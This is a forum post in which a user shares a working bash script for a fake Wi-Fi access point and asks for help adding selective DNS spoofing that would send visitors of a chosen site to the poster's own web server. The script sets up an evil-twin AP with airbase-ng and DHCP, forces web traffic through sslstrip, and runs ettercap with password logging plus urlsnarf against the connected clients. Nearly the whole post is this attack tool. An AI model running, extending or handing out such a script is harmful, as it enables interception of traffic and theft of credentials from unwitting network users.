Hi,
I found a script for a fake AP and it is working!
It creates a wifi and accepts clients letting them surf the web through my ethernet card, which is connected to my LAN.
Now I would like to add selective dns spoofing to it, so I can redirect to my PC running Apache only DNS requests for an example site, like www.blahblah.com and let users surf internet for other sites...
Is it possible? I tried to modify my script, but it doesn-t work..
Can you help me, please?
Thank you very much.
Here is the script
Code:
# Clear iptables
iptables --flush # delete all rules in default (filter) table
iptables -t nat --flush
iptables -t mangle --flush
iptables -X # delete user-defined chains
iptables -t nat -X
iptables -t mangle -X
#automatic IP gateway
GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}')
echo "[+] Interfaces"
INTCONN= #internet connected interface
INTAP= #ap interface
ESSID= #net name
ifconfig -a | grep eth | awk '{ print $1" "$5 }' 2>/dev/null
ifconfig -a | grep wlan | awk '{ print $1" "$5 }'
echo -e "\ninsert internet cnnected interface"
read INTCONN
echo -e "Insert AP interface"
read INTAP
echo -e "ESSID"
read ESSID
#activating monitor
airmon-ng stop $INTAP
MONITOR=$(airmon-ng start $INTAP | awk '/mon/ {print $5}' | sed s/.$//)
# need a working nameserver from our internet connection
var=$(grep "nameserver" /etc/resolv.conf | awk '{print $2}' |wc -l) # count the number of nameservers in resolv.conf
if [[ $var = 1 ]];then # if 1, use it in dhcpd.conf
apdns=$(grep nameserver /etc/resolv.conf | awk '{print $2}')
elif [[ $var > 1 ]];then # if more than 1 nameserver, manipulate string into an acceptable form for dhcpd.conf
apdns=$(grep nameserver /etc/resolv.conf | awk '{print $2}' | tr '\n' ',') # replace newlines with commas
apdns=${apdns//,/", "} # add a space after all commas
apdns=${apdns%", "} # delete the final comma/space
else apdns="8.8.8.8" # default in case resolv.conf is empty
fi
# Dhcpd creation
echo > /var/lib/dhcp/dhcpd.leases # Clear any pre-existing dhcp leases
cat /dev/null > /tmp/dhcpd.conf
echo "default-lease-time 300;"> /tmp/dhcpd.conf
echo "max-lease-time 360;" >> /tmp/dhcpd.conf
echo "ddns-update-style none;" >> /tmp/dhcpd.conf
echo "authoritative;" >> /tmp/dhcpd.conf
echo "log-facility local7;" >> /tmp/dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> /tmp/dhcpd.conf
echo "range 10.0.0.100 10.0.0.200;" >> /tmp/dhcpd.conf
echo "option routers 10.0.0.1;" >> /tmp/dhcpd.conf
echo "option domain-name-servers $apdns;" >> /tmp/dhcpd.conf
echo "}" >> /tmp/dhcpd.conf
echo "[+] starting Access Point..."
xterm -geometry 75x15+1+0 -T "FakeAP $fakeap - $MONITOR" -e airbase-ng -c 1 -e "$ESSID" $MONITOR & fakeapid=$!
sleep 2
# Tables
echo "[+] Configuring ip tables..."
ifconfig lo up
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -t nat -A PREROUTING -p udp -j DNAT --to $GATEWAY
iptables -P FORWARD ACCEPT
#iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $INTCONN -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# DHCP
echo "[+] Configurazione DHCP..."
touch /var/lib/dhcp/dhcpd.leases
touch /var/run/dhcpd.pid
dhcpd -cf /tmp/dhcpd.conf -pf /var/run/dhcpd.pid at0 &
sleep 3
# Sslstrip
echo "[+] starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k & sslstripid=$!
sleep 2
#Ettercap
echo "[+] starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w passwords -i at0 & ettercapid=$!
sleep 1
echo "[+] starting URLSnarf..."
xterm -geometry 75x20+1+500 -T URLSnarf -bg white -fg black -e urlsnarf -i at0 & urlsnid=$!
sleep 3
xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!